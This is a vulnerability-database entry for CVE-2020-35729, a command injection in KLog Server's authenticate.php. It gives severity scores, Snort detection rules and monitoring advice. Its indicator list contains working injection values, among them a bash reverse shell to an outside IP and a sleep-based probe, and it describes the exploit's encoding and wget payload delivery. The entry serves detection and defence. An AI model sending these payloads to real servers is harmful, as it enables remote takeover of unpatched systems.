cbcvebase.
CVE-2020-35729
published 2020-12-27

CVE-2020-35729: KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
87.99%
99.7th percentile
KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
klogserverklog_server

Detection & IOCsextracted from sources · hover to see the quote

path/actions/authenticate.php
commanduser=|22|unsafe+
commanduser=|22|
commandunsafe+%22%26sleep+40%26%22
commandtest"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&"
urlhttps://10.10.56.51:443/actions/authenticate.php
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS Possible KLOG Server RCE Inbound (CVE-2020-35729)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"user=|22|"; startswith; content:"%22%26"; fast_pattern; reference:url,docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection; reference:cve,2020-35729; classtype:attempted-admin; sid:2031590; rev:1; metadata:attack_target Server, created_at 2021_01_29, cve CVE_2020_35729, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_29;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS KLOG Server RCE Public POC Inbound - Possible Scanning (CVE-2020-35729)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"user=|22|unsafe+"; startswith; fast_pattern; reference:url,docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection; reference:cve,2020-35729; classtype:attempted-admin; sid:2031591; rev:1; metadata:attack_target Server, created_at 2021_01_29, cve CVE_2020_35729, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_29;)
  • Monitor for HTTP POST requests to /actions/authenticate.php containing shell metacharacters (e.g., %22%26, double-quote and ampersand) in the `user` POST body parameter, which is the injection point.
  • A non-302 HTTP response to a POST to /actions/authenticate.php indicates the target is vulnerable; a 302 redirect indicates it is not. Use this response-code delta for detection/confirmation.
  • Blind command injection can be confirmed via a time-delay check: inject `sleep` into the `user` parameter and observe response latency (40-second sleep used in public PoC).
  • The exploit runs commands as the `apache` user; however, the sudo configuration allows apache to run any command as root without a password, so post-exploitation process trees rooted at apache with sudo/root children are highly suspicious.
  • The Metasploit module uses a wget-based cmdstager (flavor: :wget) to deliver the payload; monitor for wget processes spawned by the apache user following a POST to authenticate.php.
  • The exploit URL-encodes spaces as `+` and forward slashes as `%2F`, and replaces semicolons with `%0A`; look for these encoding patterns in POST bodies targeting authenticate.php.
  • The nuclei PoC detection uses a base64-encoded canary: POST body contains `echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d` and checks for `poc-testing` in the response.
  • ·The exploit requires SSL (HTTPS) by default on port 443; detection rules or network sensors must inspect TLS-decrypted traffic to match the POST body patterns.
  • ·The Snort rules carry 'confidence Medium' metadata, meaning they may produce false positives in environments with legitimate applications that POST to similarly named endpoints.
  • ·The vulnerability affects KLog Server versions 2.4.1 and prior; the CPE scope is cpe:2.3:a:klogserver:klog_server:2.4.1.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.